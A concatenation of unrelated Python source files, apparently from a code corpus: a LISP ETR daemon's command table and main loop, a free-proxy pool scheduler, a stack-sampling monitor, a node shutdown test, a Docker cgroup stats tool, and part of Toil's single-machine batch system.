"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-server" : [lisp_etr_map_server_command, {
"ms-name" : [True],
"address" : [True],
"dns-name" : [True],
"authentication-type" : [False, "sha1", "sha2"],
"authentication-key" : [False],
"encryption-key" : [False],
"proxy-reply" : [False, "yes", "no"],
"want-map-notify" : [False, "yes", "no"],
"merge-registrations" : [False, "yes", "no"],
"refresh-registrations" : [False, "yes", "no"],
"site-id" : [False, 1, 0xffffffffffffffff] }],
"lisp database-mapping" : [lisp_etr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"register-ttl" : [True, 1, 0xffffffff],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp group-mapping" : [lisp_group_mapping_command, {
"group-name" : [False],
"ms-name" : [True],
"group-prefix" : [False],
"instance-id" : [True, 0, 0xffffffff],
"rle-address" : [False],
"sources" : [],
"address" : [True] }],
"show database-mapping" : [lisp_etr_show_command, { }],
"show etr-keys" : [lisp_etr_show_keys_command, {}],
"show etr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_etr_startup() == False):
lisp.lprint("lisp_etr_startup() failed")
lisp.lisp_print_banner("ETR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_socket, lisp_ipc_listen_socket]
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Info-Reply messages received on ephemeral port.
#
if (lisp_ephem_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ephem_socket, False)
if (source == ""): break
if (port == lisp.LISP_DATA_PORT):
lisp_etr_nat_data_plane(lisp_raw_socket, packet, source)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0:1])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
send_register = lisp.lisp_parse_packet(lisp_send_sockets, packet,
source, port)
#
# Info-Reply from map-server has new RTR-list, trigger a
# Map-Register and a Info-Request to the RTR.
#
if (send_register):
lisp_etr_info_timer = threading.Timer(0,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
lisp_register_timer = threading.Timer(0,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
#endif
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet.find("learn%") != -1):
lisp_etr_discover_eid(packet)
elif (packet.find("nonce%") != -1):
lisp_etr_process_nonce_ipc(packet)
elif (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
elif (packet.find("rtr%") != -1):
lisp_etr_process_rtr_updown(packet)
elif (packet.find("stats%") != -1):
packet = packet.split("%")[-1]
lisp.lisp_process_data_plane_decap_stats(packet, None)
else:
lispconfig.lisp_process_command(lisp_ipc_listen_socket,
opcode, packet, "lisp-etr", [lisp_etr_commands])
#endif
elif (opcode == "api"):
lisp.lisp_process_api("lisp-etr", lisp_ipc_listen_socket, packet)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0:1])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_etr_shutdown()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
#------------------------------------------------------------------------------
|
schedule.py
|
import time
from multiprocessing import Process
import asyncio
import aiohttp
try:
from aiohttp.errors import ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
except:
from aiohttp import ClientProxyConnectionError as ProxyConnectionError,ServerDisconnectedError,ClientResponseError,ClientConnectorError
from proxypool.db import RedisClient
from proxypool.error import ResourceDepletionError
from proxypool.getter import FreeProxyGetter
from proxypool.setting import *
from asyncio import TimeoutError
class ValidityTester(object):
test_api = TEST_API
def __init__(self):
self._raw_proxies = None
self._usable_proxies = []
def set_raw_proxies(self, proxies):
self._raw_proxies = proxies
self._conn = RedisClient()
    # use async/await to check each proxy asynchronously
async def test_single_proxy(self, proxy):
"""
        test one proxy; if it is valid, put it into the pool of usable proxies.
"""
try:
            # aiohttp is an asynchronous HTTP client library
async with aiohttp.ClientSession() as session:
try:
                    # isinstance() checks whether an object is an instance of a given type, similar to type()
if isinstance(proxy, bytes):
proxy = proxy.decode('utf-8')
real_proxy = 'http://' + proxy
print('Testing', proxy)
async with session.get(self.test_api, proxy=real_proxy, timeout=get_proxy_timeout) as response:
if response.status == 200:
self._conn.put(proxy)
print('Valid proxy', proxy)
except (ProxyConnectionError, TimeoutError, ValueError):
print('Invalid proxy', proxy)
except (ServerDisconnectedError, ClientResponseError,ClientConnectorError) as s:
print(s)
pass
def test(self):
"""
        asynchronously test all proxies.
"""
print('ValidityTester is working')
try:
loop = asyncio.get_event_loop()
tasks = [self.test_single_proxy(proxy) for proxy in self._raw_proxies]
loop.run_until_complete(asyncio.wait(tasks))
except ValueError:
print('Async Error')
class PoolAdder(object):
"""
add proxy to pool
"""
def __init__(self, threshold):
self._threshold = threshold
self._conn = RedisClient()
self._tester = ValidityTester()
self._crawler = FreeProxyGetter()
def is_over_threshold(self):
"""
        Check whether the number of proxies in the pool has reached the threshold.
"""
if self._conn.queue_len >= self._threshold:
return True
else:
return False
def add_to_queue(self):
print('PoolAdder is working')
proxy_count = 0
while not self.is_over_threshold():
for callback_label in range(self._crawler.__CrawlFuncCount__):
callback = self._crawler.__CrawlFunc__[callback_label]
raw_proxies = self._crawler.get_raw_proxies(callback)
# test crawled proxies
self._tester.set_raw_proxies(raw_proxies)
self._tester.test()
proxy_count += len(raw_proxies)
if self.is_over_threshold():
print('IP is enough, waiting to be used')
break
if proxy_count == 0:
raise ResourceDepletionError
class Schedule(object):
    @staticmethod  # a static method can be called on the class itself, C.f(), or on an instance, C().f()
    def valid_proxy(cycle=VALID_CHECK_CYCLE):  # VALID_CHECK_CYCLE is defined in the setting module
"""
        Take half of the proxies stored in redis and re-test them.
"""
conn = RedisClient()
tester = ValidityTester()
while True:
print('Refreshing ip')
            # take half of the proxies out of redis for re-checking
count = int(0.5 * conn.queue_len)
if count == 0:
print('Waiting for adding')
time.sleep(cycle)
continue
raw_proxies = conn.get(count)
tester.set_raw_proxies(raw_proxies)
tester.test()
time.sleep(cycle)
@staticmethod
def check_pool(lower_threshold=POOL_LOWER_THRESHOLD,
upper_threshold=POOL_UPPER_THRESHOLD,
cycle=POOL_LEN_CHECK_CYCLE):
"""
        If the number of proxies is less than lower_threshold, add more proxies;
        once the pool has enough, stop adding.
"""
conn = RedisClient()
adder = PoolAdder(upper_threshold)
while True:
if conn.queue_len < lower_threshold:
adder.add_to_queue()
time.sleep(cycle)
def run(self):
print('Ip processing running')
        # start two processes:
        # one takes proxies out of redis and re-validates them
valid_process = Process(target=Schedule.valid_proxy)
        # the other crawls new proxies from the web and puts them into redis
check_process = Process(target=Schedule.check_pool)
valid_process.start()
check_process.start()
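# ---------------------------------------------------------------------------
# Minimal usage sketch (not in the original file): running the scheduler
# directly assumes a reachable Redis instance and the proxypool settings
# imported above (TEST_API, VALID_CHECK_CYCLE, POOL_* thresholds). The
# project's normal entry point does something equivalent.
# ---------------------------------------------------------------------------
if __name__ == '__main__':
    Schedule().run()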
|
stack_monitor.py
|
import linecache
import logging
import os
import sys
import time
import threading
import typing as T
logger = logging.getLogger(__name__)
class StackMonitor:
"""
Uses code from the hanging_threads library: https://github.com/niccokunzmann/hanging_threads
"""
def __init__(self, name, **kwargs):
"""
:param poll_interval: Interval between stack polls (in seconds) Default: 0.1
:param print_interval: Interval between stack prints (in seconds) Default: 5
:param clear_on_print: Whether to clear the stack counters on each print to prevent memory leaks Default: True
"""
self._monitor_thread: T.Optional[StoppableThread] = None
self._print_thread: T.Optional[StoppableThread] = None
self._poll_interval = float(kwargs.get("poll_interval", 0.1))
self._print_interval = float(kwargs.get("print_interval", 5))
self._clear_on_print = bool(kwargs.get("clear_on_print", True))
self._stack_counter = {}
self._stack_lock = threading.Lock()
self._interval_start = time.time()
self._name = name
def start_monitoring(self):
self._interval_start = time.time()
if not self._monitor_thread:
self._monitor_thread = StoppableThread(target=self._monitor_fn, daemon=True)
self._monitor_thread.start()
if not self._print_thread:
self._print_thread = StoppableThread(target=self._print_stacks, daemon=True)
self._print_thread.start()
def _monitor_fn(self):
while not self._monitor_thread.is_stopped():
time.sleep(self._poll_interval)
with self._stack_lock:
frames = self._get_frames()
for thread_name in frames:
frame_str = frames[thread_name]
if thread_name not in self._stack_counter:
self._stack_counter[thread_name] = {}
if frame_str not in self._stack_counter[thread_name]:
self._stack_counter[thread_name][frame_str] = 1
else:
self._stack_counter[thread_name][frame_str] += 1
def stop_monitoring(self):
# Print the stacks one last time
self.__print()
with self._stack_lock:
if self._monitor_thread:
self._monitor_thread.stop()
if self._print_thread:
self._print_thread.stop()
def _get_frames(self):
threads = {thread.ident: thread for thread in threading.enumerate()}
res = {}
frames = sys._current_frames()
for thread_id, frame in frames.items():
if thread_id in (self._monitor_thread.ident, self._print_thread.ident):
continue
res[threads[thread_id].name] = self.thread2list(frame)
return res
@staticmethod
def thread2list(frame):
frames = []
while frame:
frames.insert(0, StackMonitor.frame2string(frame))
frame = frame.f_back
return "".join(frames)
@staticmethod
def frame2string(frame):
lineno = frame.f_lineno
co = frame.f_code
filename = co.co_filename
name = co.co_name
s = f"File '{filename}', line {lineno}, in {name}:"
line = linecache.getline(filename, lineno, frame.f_globals).lstrip()
return s + f"\r\n\t{line}"
def _print_stacks(self):
while True:
time.sleep(self._print_interval)
if self._print_thread.is_stopped():
break
self.__print()
def __print(self):
with self._stack_lock:
if len(self._stack_counter):
dt = time.time() - self._interval_start
res = f"Stack samples for process {os.getpid()}, name {self._name} for the last {dt:.0f} s.:"
for thread_id, frames_cnt in self._stack_counter.items():
res += "\r\n========================================================\r\n"
res += f"||THREAD '{thread_id}':||\r\n{self.frame_cnt_to_str(frames_cnt)}"
# logger.info(res)
print(res)
if self._clear_on_print:
self._interval_start = time.time()
self._stack_counter.clear()
@staticmethod
def frame_cnt_to_str(frames_cnt):
s = ""
for frame in sorted(frames_cnt, key=frames_cnt.get, reverse=True):
s += f">>>COUNT: {frames_cnt[frame]}:\r\n{frame}"
return s
class StoppableThread(threading.Thread):
def __init__(self, *args, **kwargs):
super(StoppableThread, self).__init__(*args, **kwargs)
self._stopped = False
def stop(self):
self._stopped = True
def is_stopped(self):
return self._stopped
# For debugging of StackMonitor
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
def fn_1():
print("Hi1")
time.sleep(1)
def fn_2():
print("Hi2")
time.sleep(0.5)
def loop():
while True:
fn_1()
fn_2()
sm = StackMonitor("")
sm.start_monitoring()
t1 = threading.Thread(target=loop, daemon=True)
t1.start()
time.sleep(5)
print("\r\nSTOPPED\r\n")
sm.stop_monitoring()
time.sleep(20)
|
feature_shutdown.py
|
#!/usr/bin/env python3
# Copyright (c) 2018 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test dftzd shutdown."""
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import assert_equal, get_rpc_proxy
from threading import Thread
def test_long_call(node):
block = node.waitfornewblock()
assert_equal(block['height'], 0)
class ShutdownTest(BitcoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 1
def run_test(self):
node = get_rpc_proxy(self.nodes[0].url, 1, timeout=600, coveragedir=self.nodes[0].coverage_dir)
Thread(target=test_long_call, args=(node,)).start()
# wait 1 second to ensure event loop waits for current connections to close
self.stop_node(0, wait=1000)
if __name__ == '__main__':
ShutdownTest().main()
|
dock_tool.py
|
import os
import re
import time
import multiprocessing
from threading import Thread
from collections import defaultdict
import json
MEMORY_PATH = '/sys/fs/cgroup/memory/docker'
CPUACCT_PATH = '/sys/fs/cgroup/cpuacct/docker/'
PID_PATH = '/sys/fs/cgroup/devices/docker'
PATH_BW = "/proc/net/route"
IMAGE_PATH = '/var/lib/docker/containers/'
hostname = os.uname()[1]
container_names = []
pids = []
containers = defaultdict(lambda: defaultdict(str))
TOTAL_CPU = multiprocessing.cpu_count()
# get bandwidth of the server
def get_interface_speed():
file_interfaces = open(PATH_BW)
interfaces = re.findall('([a-z]+\d)\W(\d+\S+)', file_interfaces.read())
interface = 'None'
for i in interfaces:
if i[1] == '00000000':
interface = i[0]
try:
bandwidth_file = open(os.path.join('/sys/class/net/', interface, 'speed'))
bandwidth_temp = int(bandwidth_file.read())
except IOError:
bandwidth_temp = 1000
return bandwidth_temp
bandwidth = get_interface_speed()
# get container names
def get_containers():
global container_names
container_names = []
for container_name in os.listdir(MEMORY_PATH):
if os.path.isdir(os.path.join(MEMORY_PATH, container_name)):
container_names.append(container_name)
try:
file_pid = open(os.path.join(PID_PATH, container_name) + '/tasks', 'r')
containers[container_name]['pid'] = file_pid.readline().strip('\n')
file_pid.close()
except IOError:
get_containers()
if not container_names:
        print("No containers found")
exit(1)
get_containers()
# get the container statistics
def get_stats():
for container_name in container_names:
image_file = json.loads(open(os.path.join(IMAGE_PATH, container_name, 'config.v2.json')).read())
containers[container_name]['Name'] = image_file['Config']['Labels']['MESOS_TASK_ID'].split('.')[0]
mem_limit_file = open(os.path.join(MEMORY_PATH, container_name, 'memory.limit_in_bytes'))
mem_usage_file = open(os.path.join(MEMORY_PATH, container_name, 'memory.usage_in_bytes'))
mem_limit = float(mem_limit_file.read())
mem_usage = float(mem_usage_file.read())
containers[container_name]['memory'] = format((mem_usage/mem_limit)*100, '.1f')
swp_limit_file = open('/proc/meminfo')
swp_usage_file = open(os.path.join(MEMORY_PATH, container_name, 'memory.memsw.usage_in_bytes'))
swp_limit = int(re.findall('SwapTotal:\s+(\d+)', swp_limit_file.read())[0])*1024
swp_usage = abs(mem_usage-float(swp_usage_file.read()))
containers[container_name]['swap'] = format((swp_usage / swp_limit) * 100, '.1f')
process = Thread(target=cal_cpu_net, args=[container_name])
process.start()
process.join()
# function for running threads
def cal_cpu_net(container_name):
path_cpu_stat = os.path.join(CPUACCT_PATH, container_name, 'cpuacct.stat')
cpu_stat = open(path_cpu_stat)
try:
net_stat = open('/proc/%s/net/dev' % containers[container_name]['pid'], 'r')
except IOError:
get_containers()
net_stat = open('/proc/%s/net/dev' % containers[container_name]['pid'], 'r')
data = net_stat.read()
net_info = (re.findall('\s+(\d+)(?:\s+\d+){7}\s+(\d+).*', data))
old_rx_eth0 = int(net_info[0][0])
old_rx_eth1 = int(net_info[1][0])
old_tx_eth0 = int(net_info[0][1])
old_tx_eth1 = int(net_info[1][1])
total_usage_old = sum([float(k) for k in re.findall('(\d+)', cpu_stat.read())])
cpu_stat.seek(0)
net_stat.seek(0)
time.sleep(1)
cpu_percent = sum([float(k) for k in re.findall('(\d+)', cpu_stat.read())]) - total_usage_old
# average cpu usage per second
data = net_stat.read()
net_info = (re.findall('\s+(\d+)(?:\s+\d+){7}\s+(\d+).*', data))
rx_eth0 = int(net_info[0][0])-old_rx_eth0
rx_eth1 = int(net_info[1][0])-old_rx_eth1
tx_eth0 = int(net_info[0][1])-old_tx_eth0
tx_eth1 = int(net_info[1][1])-old_tx_eth1
rx_percent = format(float((rx_eth0 + rx_eth1))/(bandwidth*10486), '.1f') # (1024*1024/100=10486)
tx_percent = format(float((tx_eth0 + tx_eth1))/(bandwidth*10486), '.1f')
containers[container_name]['cpu_percent'] = format(cpu_percent, '.1f')
containers[container_name]['rx_percent'] = rx_percent
containers[container_name]['tx_percent'] = tx_percent
def display():
get_stats()
os.system('clear')
print('*****************************************************************************')
print(' ID CPU Memory Swap PID Rx Tx Name ')
for name in container_names:
        print(name[:7], ' ', containers[name]['cpu_percent'], '%', ' ', containers[name]['memory'], '%', ' ',
              containers[name]['swap'], '% ', containers[name]['pid'], ' ', containers[name]['rx_percent'], ' ',
              containers[name]['tx_percent'], ' ', containers[name]['Name'])
while True:
display()
|
singleMachine.py
|
# Copyright (C) 2015-2016 Regents of the University of California
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from past.utils import old_div
from contextlib import contextmanager
import logging
import os
import time
import math
import subprocess
import sys
import traceback
from threading import Thread, Event
from threading import Lock, Condition
from six.moves.queue import Empty, Queue
import toil
from toil.batchSystems.abstractBatchSystem import BatchSystemSupport, EXIT_STATUS_UNAVAILABLE_VALUE, UpdatedBatchJobInfo
from toil.lib.threading import cpu_count
from toil import worker as toil_worker
from toil.common import Toil
log = logging.getLogger(__name__)
class SingleMachineBatchSystem(BatchSystemSupport):
"""
    The interface for running jobs on a single machine. Runs all the jobs you
    give it as they come in, but in parallel.
Uses a single "daddy" thread to manage a fleet of child processes.
Communication with the daddy thread happens via two queues: one queue of
jobs waiting to be run (the input queue), and one queue of jobs that are
finished/stopped and need to be returned by getUpdatedBatchJob (the output
queue).
When the batch system is shut down, the daddy thread is stopped.
If running in debug-worker mode, jobs are run immediately as they are sent
to the batch system, in the sending thread, and the daddy thread is not
run. But the queues are still used.
"""
@classmethod
def supportsAutoDeployment(cls):
return False
@classmethod
def supportsWorkerCleanup(cls):
return True
numCores = cpu_count()
minCores = 0.1
"""
The minimal fractional CPU. Tasks with a smaller core requirement will be rounded up to this
value.
"""
physicalMemory = toil.physicalMemory()
def __init__(self, config, maxCores, maxMemory, maxDisk):
# Limit to the smaller of the user-imposed limit and what we actually
# have on this machine for each resource.
#
# If we don't have up to the limit of the resource (and the resource
        # isn't the unlimited sentinel), warn.
if maxCores > self.numCores:
if maxCores != sys.maxsize:
# We have an actually specified limit and not the default
log.warning('Not enough cores! User limited to %i but we only have %i.', maxCores, self.numCores)
maxCores = self.numCores
if maxMemory > self.physicalMemory:
if maxMemory != sys.maxsize:
# We have an actually specified limit and not the default
log.warning('Not enough memory! User limited to %i bytes but we only have %i bytes.', maxMemory, self.physicalMemory)
maxMemory = self.physicalMemory
self.physicalDisk = toil.physicalDisk(config)
if maxDisk > self.physicalDisk:
if maxDisk != sys.maxsize:
# We have an actually specified limit and not the default
log.warning('Not enough disk space! User limited to %i bytes but we only have %i bytes.', maxDisk, self.physicalDisk)
maxDisk = self.physicalDisk
super(SingleMachineBatchSystem, self).__init__(config, maxCores, maxMemory, maxDisk)
assert self.maxCores >= self.minCores
assert self.maxMemory >= 1
# The scale allows the user to apply a factor to each task's cores requirement, thereby
# squeezing more tasks onto each core (scale < 1) or stretching tasks over more cores
# (scale > 1).
self.scale = config.scale
if config.badWorker > 0 and config.debugWorker:
# We can't throw SIGUSR1 at the worker because it is also going to
# be the leader and/or test harness.
raise RuntimeError("Cannot use badWorker and debugWorker together; "
"worker would have to kill the leader")
self.debugWorker = config.debugWorker
# A counter to generate job IDs and a lock to guard it
self.jobIndex = 0
self.jobIndexLock = Lock()
# A dictionary mapping IDs of submitted jobs to the command line
self.jobs = {}
"""
:type: dict[str,toil.job.JobDescription]
"""
# A queue of jobs waiting to be executed. Consumed by the daddy thread.
self.inputQueue = Queue()
# A queue of finished jobs. Produced by the daddy thread.
self.outputQueue = Queue()
# A dictionary mapping IDs of currently running jobs to their Info objects
self.runningJobs = {}
"""
:type: dict[str,Info]
"""
# These next two are only used outside debug-worker mode
# A dict mapping PIDs to Popen objects for running jobs.
# Jobs that don't fork are executed one at a time in the main thread.
self.children = {}
"""
:type: dict[int,subprocess.Popen]
"""
# A dict mapping child PIDs to the Job IDs they are supposed to be running.
self.childToJob = {}
"""
:type: dict[int,str]
"""
# A pool representing available CPU in units of minCores
self.coreFractions = ResourcePool(int(old_div(self.maxCores, self.minCores)), 'cores')
# A pool representing available memory in bytes
self.memory = ResourcePool(self.maxMemory, 'memory')
# A pool representing the available space in bytes
self.disk = ResourcePool(self.maxDisk, 'disk')
# If we can't schedule something, we fill this in with a reason why
self.schedulingStatusMessage = None
# We use this event to signal shutdown
self.shuttingDown = Event()
# A thread in charge of managing all our child processes.
# Also takes care of resource accounting.
self.daddyThread = None
# If it breaks it will fill this in
self.daddyException = None
if self.debugWorker:
log.debug('Started in worker debug mode.')
else:
self.daddyThread = Thread(target=self.daddy, daemon=True)
self.daddyThread.start()
log.debug('Started in normal mode.')
def daddy(self):
"""
Be the "daddy" thread.
Our job is to look at jobs from the input queue.
If a job fits in the available resources, we allocate resources for it
and kick off a child process.
We also check on our children.
When a child finishes, we reap it, release its resources, and put its
information in the output queue.
"""
try:
log.debug('Started daddy thread.')
while not self.shuttingDown.is_set():
# Main loop
while not self.shuttingDown.is_set():
# Try to start as many jobs as we can try to start
try:
# Grab something from the input queue if available.
args = self.inputQueue.get_nowait()
jobCommand, jobID, jobCores, jobMemory, jobDisk, environment = args
coreFractions = int(old_div(jobCores, self.minCores))
# Try to start the child
result = self._startChild(jobCommand, jobID,
coreFractions, jobMemory, jobDisk, environment)
if result is None:
# We did not get the resources to run this job.
# Requeue last, so we can look at the next job.
# TODO: Have some kind of condition the job can wait on,
# but without threads (queues for jobs needing
# cores/memory/disk individually)?
self.inputQueue.put(args)
break
# Otherwise it's a PID if it succeeded, or False if it couldn't
# start. But we don't care either way here.
except Empty:
# Nothing to run. Stop looking in the queue.
break
# Now check on our children.
for done_pid in self._pollForDoneChildrenIn(self.children):
# A child has actually finished.
# Clean up after it.
self._handleChild(done_pid)
# Then loop again: start and collect more jobs.
# TODO: It would be good to be able to wait on a new job or a finished child, whichever comes first.
# For now we just sleep and loop.
time.sleep(0.01)
# When we get here, we are shutting down.
for popen in self.children.values():
# Kill all the children, going through popen to avoid signaling re-used PIDs.
popen.kill()
for popen in self.children.values():
# Reap all the children
popen.wait()
# Then exit the thread.
return
except Exception as e:
log.critical('Unhandled exception in daddy thread: %s', traceback.format_exc())
# Pass the exception back to the main thread so it can stop the next person who calls into us.
self.daddyException = e
raise
def _checkOnDaddy(self):
if self.daddyException is not None:
# The daddy thread broke and we cannot do our job
log.critical('Propagating unhandled exception in daddy thread to main thread')
exc = self.daddyException
self.daddyException = None
raise exc
def _pollForDoneChildrenIn(self, pid_to_popen):
"""
See if any children represented in the given dict from PID to Popen
object have finished.
Return a collection of their PIDs.
Guarantees that each child's exit code will be gettable via wait() on
the child's Popen object (i.e. does not reap the child, unless via
Popen).
"""
# We keep our found PIDs in a set so we can work around waitid showing
# us the same one repeatedly.
ready = set()
# Find the waitid function
waitid = getattr(os, 'waitid', None)
if callable(waitid):
# waitid exists (not Mac)
while True:
# Poll for any child to have exit, but don't reap it. Leave reaping
# to the Popen.
# TODO: What if someone else in Toil wants to do this syscall?
# TODO: Is this one-notification-per-done-child with WNOHANG? Or
# can we miss some? Or do we see the same one repeatedly until it
# is reaped?
try:
siginfo = waitid(os.P_ALL, -1, os.WEXITED | os.WNOWAIT | os.WNOHANG)
except ChildProcessError:
# This happens when there is nothing to wait on right now,
# instead of the weird C behavior of overwriting a field in
# a pointed-to struct.
siginfo = None
if siginfo is not None and siginfo.si_pid in pid_to_popen and siginfo.si_pid not in ready:
# Something new finished
ready.add(siginfo.si_pid)
else:
# Nothing we own that we haven't seen before has finished.
return ready
else:
# On Mac there's no waitid and no way to wait and not reap.
# Fall back on polling all the Popen objects.
# To make this vaguely efficient we have to return done children in
# batches.
for pid, popen in pid_to_popen.items():
if popen.poll() is not None:
# Process is done
ready.add(pid)
log.debug('Child %d has stopped', pid)
# Return all the done processes we found
return ready
def _runDebugJob(self, jobCommand, jobID, environment):
"""
Run the jobCommand right now, in the current thread.
May only be called in debug-worker mode.
Assumes resources are available.
"""
assert self.debugWorker
# TODO: It is not possible to kill running jobs in forkless mode,
# because they are run immediately in the main thread.
info = Info(time.time(), None, None, killIntended=False)
self.runningJobs[jobID] = info
if jobCommand.startswith("_toil_worker "):
# We can actually run in this thread
jobName, jobStoreLocator, jobStoreID = jobCommand.split()[1:] # Parse command
jobStore = Toil.resumeJobStore(jobStoreLocator)
toil_worker.workerScript(jobStore, jobStore.config, jobName, jobStoreID,
redirectOutputToLogFile=not self.debugWorker) # Call the worker
else:
# Run synchronously. If starting or running the command fails, let the exception stop us.
subprocess.check_call(jobCommand,
shell=True,
env=dict(os.environ, **environment))
self.runningJobs.pop(jobID)
if not info.killIntended:
self.outputQueue.put(UpdatedBatchJobInfo(jobID=jobID, exitStatus=0, wallTime=time.time() - info.time, exitReason=None))
def getSchedulingStatusMessage(self):
# Implement the abstractBatchSystem's scheduling status message API
return self.schedulingStatusMessage
def _setSchedulingStatusMessage(self, message):
"""
If we can't run a job, we record a short message about why not. If the
leader wants to know what is up with us (for example, to diagnose a
deadlock), it can ask us for the message.
"""
self.schedulingStatusMessage = message
def _startChild(self, jobCommand, jobID, coreFractions, jobMemory, jobDisk, environment):
"""
Start a child process for the given job.
        Allocate its required resources and save it in our bookkeeping structures.
If the job is started, returns its PID.
If the job fails to start, reports it as failed and returns False.
If the job cannot get the resources it needs to start, returns None.
"""
# We fill this in if we manage to actually start the child.
popen = None
# This is when we started working on the job.
startTime = time.time()
# See if we can fit the job in our resource pools right now.
if self.coreFractions.acquireNow(coreFractions):
# We got some cores
if self.memory.acquireNow(jobMemory):
# We got some memory
if self.disk.acquireNow(jobDisk):
# We got the final resource, disk.
# Actually run the job.
# When it finishes we will release what it was using.
# So it is important to not lose track of the child process.
try:
# Launch the job
popen = subprocess.Popen(jobCommand,
shell=True,
env=dict(os.environ, **environment))
except Exception:
# If the job can't start, make sure we release resources now
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self.disk.release(jobDisk)
log.error('Could not start job %s: %s', jobID, traceback.format_exc())
# Report as failed.
self.outputQueue.put(UpdatedBatchJobInfo(jobID=jobID, exitStatus=EXIT_STATUS_UNAVAILABLE_VALUE, wallTime=0, exitReason=None))
# Free resources
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self.disk.release(jobDisk)
# Complain it broke.
return False
else:
# If the job did start, record it
self.children[popen.pid] = popen
# Make sure we can look it up by PID later
self.childToJob[popen.pid] = jobID
# Record that the job is running, and the resources it is using
info = Info(startTime, popen, (coreFractions, jobMemory, jobDisk), killIntended=False)
self.runningJobs[jobID] = info
log.debug('Launched job %s as child %d', jobID, popen.pid)
# Report success starting the job
# Note that if a PID were somehow 0 it would look like False
assert popen.pid != 0
return popen.pid
else:
# We can't get disk, so free cores and memory
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self._setSchedulingStatusMessage('Not enough disk to run job %s' % jobID)
else:
# Free cores, since we can't get memory
self.coreFractions.release(coreFractions)
self._setSchedulingStatusMessage('Not enough memory to run job %s' % jobID)
else:
self._setSchedulingStatusMessage('Not enough cores to run job %s' % jobID)
# If we get here, we didn't succeed or fail starting the job.
# We didn't manage to get the resources.
# Report that.
return None
def _handleChild(self, pid):
"""
Handle a child process PID that has finished.
The PID must be for a child job we started.
Not thread safe to run at the same time as we are making more children.
Remove the child from our bookkeeping structures and free its resources.
"""
# Look up the child
popen = self.children[pid]
jobID = self.childToJob[pid]
info = self.runningJobs[jobID]
# Unpack the job resources
(coreFractions, jobMemory, jobDisk) = info.resources
# Clean up our records of the job.
self.runningJobs.pop(jobID)
self.childToJob.pop(pid)
self.children.pop(pid)
# See how the child did, and reap it.
statusCode = popen.wait()
if statusCode != 0 and not info.killIntended:
log.error("Got exit code %i (indicating failure) "
"from job %s.", statusCode, self.jobs[jobID])
if not info.killIntended:
# Report if the job failed and we didn't kill it.
# If we killed it then it shouldn't show up in the queue.
self.outputQueue.put(UpdatedBatchJobInfo(jobID=jobID, exitStatus=statusCode, wallTime=time.time() - info.time, exitReason=None))
# Free up the job's resources.
self.coreFractions.release(coreFractions)
self.memory.release(jobMemory)
self.disk.release(jobDisk)
log.debug('Child %d for job %s succeeded', pid, jobID)
def issueBatchJob(self, jobDesc):
"""Adds the command and resources to a queue to be run."""
self._checkOnDaddy()
# Round cores to minCores and apply scale.
# Make sure to give minCores even if asked for 0 cores, or negative or something.
cores = max(math.ceil(jobDesc.cores * self.scale / self.minCores) * self.minCores, self.minCores)
# Don't do our own assertions about job size vs. our configured size.
# The abstract batch system can handle it.
self.checkResourceRequest(jobDesc.memory, cores, jobDesc.disk, name=jobDesc.jobName,
detail='Scale is set to {}.'.format(self.scale))
self.checkResourceRequest(jobDesc.memory, cores, jobDesc.disk)
